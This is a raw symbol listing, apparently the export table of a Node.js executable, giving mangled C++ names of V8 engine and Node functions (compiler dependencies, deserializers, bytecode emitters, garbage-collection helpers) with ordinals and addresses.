                                  ?DependOnFieldRepresentation@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@VInternalIndex@34@@Z44450x140f0eed0
                                  ?DependOnFieldType@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@VInternalIndex@34@@Z44460x140f0ef30
                                  ?DependOnGlobalProperty@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVPropertyCellRef@234@@Z44470x140f0ef90
                                  ?DependOnInitialMap@CompilationDependencies@compiler@internal@v8@@QEAA?AVMapRef@234@AEBVJSFunctionRef@234@@Z44480x140f0f070
                                  ?DependOnInitialMapInstanceSizePrediction@CompilationDependencies@compiler@internal@v8@@QEAA?AVSlackTrackingPrediction@234@AEBVJSFunctionRef@234@@Z44490x140f0f140
                                  ?DependOnNoElementsProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ44500x140f0f240
                                  ?DependOnPretenureMode@CompilationDependencies@compiler@internal@v8@@QEAA?AW4AllocationType@34@AEBVAllocationSiteRef@234@@Z44510x140f0f2a0
                                  ?DependOnPromiseHookProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ44520x140f0f360
                                  ?DependOnPromiseSpeciesProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ44530x140f0f3c0
                                  ?DependOnPromiseThenProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NXZ44540x140f0f420
                                  ?DependOnProtector@CompilationDependencies@compiler@internal@v8@@QEAA_NAEBVPropertyCellRef@234@@Z44550x140f0f480
                                  ?DependOnPrototypeProperty@CompilationDependencies@compiler@internal@v8@@QEAA?AVObjectRef@234@AEBVJSFunctionRef@234@@Z44560x140f0f550
                                  ?DependOnStableMap@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@@Z44570x140f0f620
                                  ?DependOnTransition@CompilationDependencies@compiler@internal@v8@@QEAAXAEBVMapRef@234@@Z44580x140f0f850
                                  ?Description@Symbol@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ44590x140a82a90
                                  ?Deserialize@ContextDeserializer@internal@v8@@AEAA?AV?$MaybeHandle@VObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VJSGlobalProxy@internal@v8@@@23@UDeserializeInternalFieldsCallback@3@@Z44600x140611360
                                  ?DeserializeContext@ContextDeserializer@internal@v8@@SA?AV?$MaybeHandle@VContext@internal@v8@@@23@PEAVIsolate@23@PEBVSnapshotData@23@_NV?$Handle@VJSGlobalProxy@internal@v8@@@23@UDeserializeInternalFieldsCallback@3@@Z44610x140611560
                                  ?DeserializeDeferredObjects@Deserializer@internal@v8@@IEAAXXZ44620x14060d8d0
                                  ?DeserializeEmbedderFields@ContextDeserializer@internal@v8@@AEAAXUDeserializeInternalFieldsCallback@3@@Z44630x140611620
                                  ?DeserializeNativeModule@wasm@internal@v8@@YA?AV?$MaybeHandle@VWasmModuleObject@internal@v8@@@23@PEAVIsolate@23@V?$Vector@$$CBE@23@1V?$Vector@$$CBD@23@@Z44640x140519fd0
                                  ?DeserializeReceiver@DeclarationScope@internal@v8@@QEAAXPEAVAstValueFactory@23@@Z44650x140a54970
                                  ?DeserializeScopeChain@Parser@internal@v8@@QEAAXPEAVIsolate@23@PEAVParseInfo@23@V?$MaybeHandle@VScopeInfo@internal@v8@@@23@W4DeserializationMode@Scope@23@@Z44660x14072d300
                                  ?DeserializeScopeChain@Scope@internal@v8@@SAPEAV123@PEAVIsolate@23@PEAVZone@23@VScopeInfo@23@PEAVDeclarationScope@23@PEAVAstValueFactory@23@W4DeserializationMode@123@@Z44670x140a549f0
                                  ?Destroy@GlobalHandles@internal@v8@@SAXPEA_K@Z44680x1409655c0
                                  ?DestroyTraced@GlobalHandles@internal@v8@@SAXPEA_K@Z44690x1409655d0
                                  ?DesugarBindingInForEachStatement@Parser@internal@v8@@AEAAXPEAUForInfo@?$ParserBase@VParser@internal@v8@@@23@PEAPEAVBlock@23@PEAPEAVExpression@23@@Z44700x14072d3b0
                                  ?DesugarLexicalBindingsInForStatement@Parser@internal@v8@@AEAAPEAVStatement@23@PEAVForStatement@23@PEAV423@PEAVExpression@23@11PEAVScope@23@AEBUForInfo@?$ParserBase@VParser@internal@v8@@@23@@Z44710x14072d570
                                  ?Detach@ArrayBuffer@v8@@QEAAXXZ44720x140a82b50
                                  ?Detach@DeferredHandleScope@internal@v8@@QEAA?AV?$unique_ptr@VDeferredHandles@internal@v8@@U?$default_delete@VDeferredHandles@internal@v8@@@std@@@std@@XZ44730x140963fb0
                                  ?Detach@JSArrayBuffer@internal@v8@@QEAAX_N@Z44740x1407e7c30
                                  ?DetachAt@LiveRange@compiler@internal@v8@@QEAAPEAVUsePosition@234@VLifetimePosition@234@PEAV1234@PEAVZone@34@W4HintConnectionOption@1234@@Z44750x140ef6360
                                  ?DetachFromHeap@Space@internal@v8@@IEAAXXZ44760x140422250
                                  ?DetachGlobal@Context@v8@@QEAAXXZ44770x140a82d90
                                  ?DetachPersistentHandles@LocalHeap@internal@v8@@QEAA?AV?$unique_ptr@VPersistentHandles@internal@v8@@U?$default_delete@VPersistentHandles@internal@v8@@@std@@@std@@XZ44780x14091cc10
                                  ?DetailsAt@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z44790x140422260
                                  ?DetailsAt@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z44800x140422290
                                  ?DetailsAt@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z44810x140774030
                                  ?DetailsAt@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAA?AVPropertyDetails@23@VInternalIndex@23@@Z44820x140774050
                                  ?DetailsAt@OrderedNameDictionaryHandler@internal@v8@@SA?AVPropertyDetails@23@VHeapObject@23@H@Z44830x14075ee60
                                  ?DetailsAtPut@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z44840x1404222c0
                                  ?DetailsAtPut@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z44850x140422330
                                  ?DetailsAtPut@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z44860x140774070
                                  ?DetailsAtPut@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@QEAAXVInternalIndex@23@VPropertyDetails@23@@Z44870x1407740a0
                                  ?DetailsAtPut@OrderedNameDictionaryHandler@internal@v8@@SAXVHeapObject@23@HVPropertyDetails@23@@Z44880x14075eec0
                                  ?DetectableCallable@Type@compiler@internal@v8@@SA?AV1234@XZ44890x1404597c0
                                  ?DetectableObject@Type@compiler@internal@v8@@SA?AV1234@XZ44900x1404597d0
                                  ?DetectableReceiver@Type@compiler@internal@v8@@SA?AV1234@XZ44910x1404597e0
                                  ?DetectableReceiverOrNull@Type@compiler@internal@v8@@SA?AV1234@XZ44920x1404597f0
                                  ?DetermineParticipation@ControlEquivalence@compiler@internal@v8@@AEAAXPEAVNode@234@@Z44930x140ff8750
                                  ?DetermineParticipationEnqueue@ControlEquivalence@compiler@internal@v8@@AEAAXAEAV?$ZoneQueue@PEAVNode@compiler@internal@v8@@@34@PEAVNode@234@@Z44940x140ff8a60
                                  ?DetermineStubCallMode@CodeGenerator@compiler@internal@v8@@AEBA?AW4StubCallMode@34@XZ44950x140e4a630
                                  ?DidAllocateDoubleRegisters@Frame@compiler@internal@v8@@QEBA_NXZ44960x1404537d0
                                  ?DidFinishModuleAsyncEvaluation@Isolate@internal@v8@@QEAAXI@Z44970x140422360
                                  ?DirectorySeparator@OS@base@v8@@SADXZ44980x140dc0790
                                  ?Disable@CodeEventHandler@v8@@QEAAXXZ44990x140a82de0
                                  ?DisableCompilationForSourcelessUse@V8@v8@@SAXXZ45000x140a82df0
                                  ?DisableEmbeddedBlobRefcounting@internal@v8@@YAXXZ45010x14097d3a0
                                  ?DisableInlineAllocation@Heap@internal@v8@@QEAAXXZ45020x14092d090
                                  ?DisableInterrupts@StackGuard@internal@v8@@AEAAXXZ45030x14096c830
                                  ?DisableIteration@IdentityMapBase@internal@v8@@IEAAXXZ45040x1405f3250
                                  ?DisableLogging@CpuProfiler@internal@v8@@AEAAXXZ45050x1406e78e0
                                  ?DisableMemorySavingsMode@Isolate@internal@v8@@QEAAXXZ45060x140422380
                                  ?DisableMemorySavingsMode@Isolate@v8@@QEAAXXZ45070x140422380
                                  ?DisableScriptAndEval@CompilationCache@internal@v8@@QEAAXXZ45080x1409f7830
                                  ?Disassemble@BytecodeArray@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z45090x140834190
                                  ?Disassemble@Code@internal@v8@@QEAAXPEBDAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@PEAVIsolate@23@_K@Z45100x1408351b0
                                  ?Disassemble@Disassembler@disasm@@SAXPEAU_iobuf@@PEAE1W4UnimplementedOpcodeAction@12@@Z45110x14044c160
                                  ?Disassemble@WasmCode@wasm@internal@v8@@QEBAXPEBDAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@_K@Z45120x14056f580
                                  ?DiscardCompiled@SharedFunctionInfo@internal@v8@@SAXPEAVIsolate@23@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@@Z45130x1407742c0
                                  ?DiscardPerThreadDataForThisThread@Isolate@internal@v8@@QEAAXXZ45140x14097d420
                                  ?DiscardReservedEntry@ConstantArrayBuilder@interpreter@internal@v8@@QEAAXW4OperandSize@234@@Z45150x14086e160
                                  ?DiscardSystemPages@BoundedPageAllocator@base@v8@@UEAA_NPEAX_K@Z45160x140dca080
                                  ?DiscardSystemPages@OS@base@v8@@CA_NPEAX_K@Z45170x140dc07a0
                                  ?DiscardSystemPages@PageAllocator@base@v8@@UEAA_NPEAX_K@Z45180x140dc8b40
                                  ?DiscardThreadSpecificMetadata@Isolate@v8@@QEAAXXZ45190x140a82e10
                                  ?DispatchCodeEvent@ProfilerListener@internal@v8@@AEAAXAEBVCodeEventsContainer@23@@Z45200x1406cc9b0
                                  ?Dispose@CpuProfiler@v8@@QEAAXXZ45210x140a82e20
                                  ?Dispose@ExternalStringResourceBase@String@v8@@MEAAXXZ45220x140076af0
                                  ?Dispose@Isolate@v8@@QEAAXXZ45230x140a82e50
                                  ?Dispose@V8@v8@@SA_NXZ45240x140a82ed0
                                  ?DisposeGlobal@V8@v8@@CAXPEA_K@Z45250x140a82ee0
                                  ?DisposeTracedGlobal@V8@v8@@CAXPEA_K@Z45260x140a82ef0
                                  ?Divide@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ45270x140e0b380
                                  ?DivideModuloIntBignum@Bignum@internal@v8@@QEAAGAEBV123@@Z45280x1408486a0
                                  ?DoBackgroundWork@CompilerDispatcher@internal@v8@@AEAAXXZ45290x1409d57f0
                                  ?DoIdleWork@CompilerDispatcher@internal@v8@@AEAAXN@Z45300x1409d5cb0
                                  ?DoIntegerToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z45310x140fd3fa0
                                  ?DoIntegral32ToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z45320x140fd41e0
                                  ?DoJSToNumberOrNumericTruncatesToFloat64@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRepresentationSelector@234@@Z45330x140fd4350
                                  ?DoJSToNumberOrNumericTruncatesToWord32@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEAVRepresentationSelector@234@@Z45340x140fd4ba0
                                  ?DoLdar@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@@Z45350x140870e80
                                  ?DoMax@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEBVOperator@234@W4MachineRepresentation@34@@Z45360x140fd53c0
                                  ?DoMin@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@PEBVOperator@234@W4MachineRepresentation@34@@Z45370x140fd5560
                                  ?DoMov@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@0@Z45380x140870ea0
                                  ?DoNumberToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z45390x140fd5680
                                  ?DoNumberToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z45400x140fd57d0
                                  ?DoOrderedNumberToBit@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z45410x140fd5a50
                                  ?DoParseFunction@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEAVIsolate@23@PEAVParseInfo@23@HHHPEBVAstRawString@23@@Z45420x14072e890
                                  ?DoParseMemberExpressionContinuation@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAPEAVExpression@23@PEAV423@@Z45430x1406fa920
                                  ?DoParseProgram@Parser@internal@v8@@AEAAPEAVFunctionLiteral@23@PEAVIsolate@23@PEAVParseInfo@23@@Z45440x14072f2f0
                                  ?DoPromiseChecks@JSCallReducer@compiler@internal@v8@@AEAA_NPEAVMapInference@234@@Z45450x140f407c0
                                  ?DoSample@Sampler@sampler@v8@@QEAAXXZ45460x140dcb690
                                  ?DoSigned32ToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z45470x140fd5be0
                                  ?DoStar@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAAXVRegister@234@@Z45480x140870ed0
                                  ?DoUnsigned32ToUint8Clamped@SimplifiedLowering@compiler@internal@v8@@QEAAXPEAVNode@234@@Z45490x140fd5e10
                                  ?Done@BreakIterator@internal@v8@@QEBA_NXZ45500x140422390
                                  ?Done@EhFrameIterator@internal@v8@@QEBA_NXZ45510x1404483b0
                                  ?DotPrintForTesting@RegExp@internal@v8@@SAXPEBDPEAVRegExpNode@23@@Z45520x1406a57a0
                                  ?Double@AsmType@wasm@internal@v8@@SAPEAV1234@XZ45530x140a63180
                                  ?DoubleQ@AsmType@wasm@internal@v8@@SAPEAV1234@XZ45540x140a63190
                                  ?DoubleToAscii@internal@v8@@YAXNW4DtoaMode@12@HV?$Vector@D@12@PEAH22@Z45550x140842d70
                                  ?DoubleToCString@internal@v8@@YAPEBDNV?$Vector@D@12@@Z45560x140845fb0
                                  ?DoubleValue@Scanner@internal@v8@@QEAANXZ45570x1406eae80
                                  ?Drop@MacroAssembler@internal@v8@@QEAAXH@Z45580x14049a160
                                  ?Drop@RegExpMacroAssemblerX64@internal@v8@@AEAAXXZ45590x140445800
                                  ?DropUnderReturnAddress@MacroAssembler@internal@v8@@QEAAXHVRegister@23@@Z45600x14049a1a0
                                  ?DumpAndResetStats@Isolate@internal@v8@@QEAAXXZ45610x14097d640
                                  ?DumpAndResetStats@Isolate@v8@@QEAAXXZ45620x140a82f00
                                  ?DumpAndResetTurboStatistics@WasmEngine@wasm@internal@v8@@QEAAXXZ45630x14055e640
                                  ?DumpAsyncTaskStacksStateForTest@v8_inspector@@YAXPEAVV8Inspector@1@@Z45640x1405054f0
                                  ?DynamicGrowingFactor@?$MemoryController@UGlobalMemoryTrait@internal@v8@@@internal@v8@@CANNNN@Z45650x14093e140
                                  ?DynamicGrowingFactor@?$MemoryController@UV8HeapTrait@internal@v8@@@internal@v8@@CANNNN@Z45660x14093e140
                                  ?EffectInputCount@Operator@compiler@internal@v8@@QEBAHXZ45670x140346150
                                  ?EffectOutputCount@Operator@compiler@internal@v8@@QEBAHXZ45680x140243fa0
                                  ?EffectPhi@CommonOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z45690x140e0a0f0
                                  ?ElapsedTime@CompilationJob@internal@v8@@IEBA?AVTimeDelta@base@3@XZ45700x1405aea70
                                  ?ElementAccessOf@compiler@internal@v8@@YAAEBUElementAccess@123@PEBVOperator@123@@Z45710x1402e6a30
                                  ?ElementAdded@HashTableBase@internal@v8@@QEAAXXZ45720x1404223a0
                                  ?ElementRemoved@HashTableBase@internal@v8@@QEAAXXZ45730x1404223c0
                                  ?ElementSizeInBytes@AsmType@wasm@internal@v8@@QEAAHXZ45740x140a631a0
                                  ?ElementSizeInBytes@internal@v8@@YAHW4MachineRepresentation@12@@Z45750x1404223f0
                                  ?ElementSizeLog2Of@internal@v8@@YAHW4MachineRepresentation@12@@Z45760x140422410
                                  ?ElementsKindToByteSize@internal@v8@@YAHW4ElementsKind@12@@Z45770x14082d840
                                  ?ElementsKindToShiftSize@internal@v8@@YAHW4ElementsKind@12@@Z45780x14082d860
                                  ?ElementsRemoved@HashTableBase@internal@v8@@QEAAXH@Z45790x140422490
                                  ?ElementsTransitionAndStore@CodeFactory@internal@v8@@SA?AVCallable@23@PEAVIsolate@23@W4KeyedAccessStoreMode@23@@Z45800x1409f94c0
                                  ?Eliminate@MoveOperands@compiler@internal@v8@@QEAAXXZ45810x140453810
                                  ?EliminateLoopExits@LoopPeeler@compiler@internal@v8@@SAXPEAVGraph@234@PEAVZone@34@@Z45820x140fa2840
                                  ?EliminateRedundantPhiNodes@Schedule@compiler@internal@v8@@AEAAXXZ45830x140e428f0
                                  ?Else@ConditionalControlFlowBuilder@interpreter@internal@v8@@QEAAXXZ45840x14086cbc0
                                  ?EmbedderAllocationThroughputInBytesPerMillisecond@GCTracer@internal@v8@@QEBANN@Z45850x14093fca0
                                  ?EmbedderSpeedInBytesPerMillisecond@GCTracer@internal@v8@@QEBANXZ45860x14093fd40
                                  ?EmbedderStep@IncrementalMarking@internal@v8@@QEAA?AW4StepResult@23@NPEAN@Z45870x140920d40
                                  ?Emit16@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z45880x1406c9f50
                                  ?Emit32@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z45890x1406c9f90
                                  ?Emit8@RegExpBytecodeGenerator@internal@v8@@AEAAXI@Z45900x1406c9fd0
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@000000_KPEAV6234@@Z45910x140e35a70
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00000_KPEAV6234@@Z45920x140e35bc0
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0000_KPEAV6234@@Z45930x140e35d00
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@000_KPEAV6234@@Z45940x140e35e30
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00_KPEAV6234@@Z45950x140e35f50
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0_KPEAV6234@@Z45960x140e36060
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@_KPEAV6234@@Z45970x140e36160
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@0101@Z45980x140e36250
                                  ?Emit@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@PEAV5234@@Z45990x140e362f0
                                  ?Emit@LocalDeclEncoder@wasm@internal@v8@@QEBA_KPEAE@Z46000x14059a870
                                  ?Emit@RegExpBytecodeGenerator@internal@v8@@AEAAXIH@Z46010x1406ca010
                                  ?Emit@RegExpBytecodeGenerator@internal@v8@@AEAAXII@Z46020x1406ca010
                                  ?Emit@SafepointTableBuilder@internal@v8@@QEAAXPEAVAssembler@23@H@Z46030x1409d9710
                                  ?Emit@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@@Z46040x14052f410
                                  ?EmitAsyncDestroy@node@@YAXPEAVEnvironment@1@Uasync_context@1@@Z46050x140246390
                                  ?EmitAsyncDestroy@node@@YAXPEAVIsolate@v8@@Uasync_context@1@@Z46060x1402463a0
                                  ?EmitAsyncInit@node@@YA?AUasync_context@1@PEAVIsolate@v8@@V?$Local@VObject@v8@@@4@PEBDN@Z46070x1402463d0
                                  ?EmitAsyncInit@node@@YA?AUasync_context@1@PEAVIsolate@v8@@V?$Local@VObject@v8@@@4@V?$Local@VString@v8@@@4@N@Z46080x140246520
                                  ?EmitBeforeExit@node@@YAXPEAVEnvironment@1@@Z46090x1402465d0
                                  ?EmitBinarySearchSwitch@InstructionSelector@compiler@internal@v8@@AEAAXAEBVSwitchInfo@234@AEBVInstructionOperand@234@@Z46100x140e36320
                                  ?EmitByte@WasmFunctionBuilder@wasm@internal@v8@@QEAAXE@Z46110x14052f450
                                  ?EmitBytecode@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXQEBVBytecodeNode@234@@Z46120x140889150
                                  ?EmitCode@WasmFunctionBuilder@wasm@internal@v8@@QEAAXPEBEI@Z46130x14052f490
                                  ?EmitDirectCallIndex@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z46140x14052f4e0
                                  ?EmitExit@node@@YAHPEAVEnvironment@1@@Z46150x1402465f0
                                  ?EmitF32Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXM@Z46160x14052f540
                                  ?EmitF64Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXN@Z46170x14052f5a0
                                  ?EmitFarJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAAX_K@Z46180x14059ab00
                                  ?EmitFunctionStartSourcePosition@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAXH@Z46190x140893e20
                                  ?EmitGetLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z46200x14052f600
                                  ?EmitI32Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAXH@Z46210x14052f610
                                  ?EmitI32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXH@Z46220x14052f650
                                  ?EmitI64Const@WasmFunctionBuilder@wasm@internal@v8@@QEAAX_J@Z46230x14052f660
                                  ?EmitIdentity@InstructionSelector@compiler@internal@v8@@QEAAXPEAVNode@234@@Z46240x140e365c0
                                  ?EmitJump@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z46250x14086cc00
                                  ?EmitJump@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeLabel@234@@Z46260x1408892b0
                                  ?EmitJumpIfFalse@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@PEAVBytecodeLabels@234@@Z46270x14086cc30
                                  ?EmitJumpIfNull@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z46280x14086cc60
                                  ?EmitJumpIfTrue@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXW4ToBooleanMode@BytecodeArrayBuilder@234@PEAVBytecodeLabels@234@@Z46290x14086cc90
                                  ?EmitJumpIfUndefined@BreakableControlFlowBuilder@interpreter@internal@v8@@IEAAXPEAVBytecodeLabels@234@@Z46300x14086ccc0
                                  ?EmitJumpLoop@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeLoopHeader@234@@Z46310x140889330
                                  ?EmitJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAA_N_K@Z46320x14059aba0
                                  ?EmitLazyCompileJumpSlot@JumpTableAssembler@wasm@internal@v8@@AEAAXI_K@Z46330x14059abe0
                                  ?EmitOrLink@RegExpBytecodeGenerator@internal@v8@@AEAAXPEAVLabel@23@@Z46340x1406ca060
                                  ?EmitPrepareArguments@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@UPushParameter@compiler@internal@v8@@@34@PEBVCallDescriptor@234@PEAVNode@234@@Z46350x140459c10
                                  ?EmitPrepareResults@InstructionSelector@compiler@internal@v8@@AEAAXPEAV?$ZoneVector@UPushParameter@compiler@internal@v8@@@34@PEBVCallDescriptor@234@PEAVNode@234@@Z46360x14045a070
                                  ?EmitProcessBeforeExit@node@@YA?AV?$Maybe@_N@v8@@PEAVEnvironment@1@@Z46370x140246620
                                  ?EmitProcessExit@node@@YA?AV?$Maybe@H@v8@@PEAVEnvironment@1@@Z46380x140246b60
                                  ?EmitReturnEntry@HandlerTable@internal@v8@@SAXPEAVAssembler@23@HH@Z46390x1409e8460
                                  ?EmitReturnTableStart@HandlerTable@internal@v8@@SAHPEAVAssembler@23@@Z46400x1409e8490
                                  ?EmitSetLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z46410x14052f6a0
                                  ?EmitSwitch@BytecodeArrayWriter@interpreter@internal@v8@@AEAAXPEAVBytecodeNode@234@PEAVBytecodeJumpTable@234@@Z46420x1408893d0
                                  ?EmitTableSwitch@InstructionSelector@compiler@internal@v8@@AEAAXAEBVSwitchInfo@234@AEBVInstructionOperand@234@@Z46430x140e36690
                                  ?EmitTeeLocal@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z46440x14052f6b0
                                  ?EmitU32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXI@Z46450x14052f6c0
                                  ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IPEAVFlagsContinuation@234@@Z46460x140e36870
                                  ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@00PEAVFlagsContinuation@234@@Z46470x140e368a0
                                  ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@0PEAVFlagsContinuation@234@@Z46480x140e36910
                                  ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@IVInstructionOperand@234@PEAVFlagsContinuation@234@@Z46490x140e36960
                                  ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@0101PEAVFlagsContinuation@234@@Z46500x140e369a0
                                  ?EmitWithContinuation@InstructionSelector@compiler@internal@v8@@QEAAPEAVInstruction@234@I_KPEAVInstructionOperand@234@01PEAVFlagsContinuation@234@@Z46510x140e36d50
                                  ?EmitWithI32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@H@Z46520x14052f730
                                  ?EmitWithPrefix@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@@Z46530x14052f780
                                  ?EmitWithU32V@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@I@Z46540x14052f840
                                  ?EmitWithU8@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@E@Z46550x14052f8e0
                                  ?EmitWithU8U8@WasmFunctionBuilder@wasm@internal@v8@@QEAAXW4WasmOpcode@234@EE@Z46560x14052f940
                                  ?EmitWordPoisonOnSpeculation@InstructionSelector@compiler@internal@v8@@AEAAXPEAVNode@234@@Z46570x140e36da0
                                  ?Empty@DeoptimizationData@internal@v8@@SA?AV?$Handle@VDeoptimizationData@internal@v8@@@23@PEAVIsolate@23@@Z46580x140836680
                                  ?Empty@ScopeInfo@internal@v8@@SA?AV123@PEAVIsolate@23@@Z46590x140758ae0
                                  ?Empty@String@v8@@SA?AV?$Local@VString@v8@@@2@PEAVIsolate@2@@Z46600x140077070
                                  ?EmptyArrayBoilerplateDescriptionConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ46610x140893e90
                                  ?EmptyBackingStore@BackingStore@internal@v8@@SA?AV?$unique_ptr@VBackingStore@internal@v8@@U?$default_delete@VBackingStore@internal@v8@@@std@@@std@@W4SharedFlag@23@@Z46620x14083ebe0
                                  ?EmptyDeleter@BackingStore@v8@@SAXPEAX_K0@Z46630x1400768e0
                                  ?EmptyFixedArrayConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ46640x140ea6c90
                                  ?EmptyFixedArrayConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ46650x140893ea0
                                  ?EmptyIdentifierString@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ46660x1406fab20
                                  ?EmptyObjectBoilerplateDescriptionConstantPoolEntry@BytecodeArrayBuilder@interpreter@internal@v8@@QEAA_KXZ46670x140893eb0
                                  ?EmptyStateValues@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ46680x140ea6d10
                                  ?EmptyStringConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ46690x140ea6d60
                                  ?EmptyStringConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VString@internal@v8@@@34@XZ46700x140ec43f0
                                  ?EmptyStringRootIsInitialized@Factory@internal@v8@@AEAA_NXZ46710x140946190
                                  ?EmptyStringRootIsInitialized@OffThreadFactory@internal@v8@@AEAA_NXZ46720x140076ae0
                                  ?Enable@CodeEventHandler@v8@@QEAAXXZ46730x140a83100
                                  ?EnableCodeLogging@WasmEngine@wasm@internal@v8@@QEAAXPEAVIsolate@34@@Z46740x14055e800
                                  ?EnableCompilationForSourcelessUse@V8@v8@@SAXXZ46750x140a83110
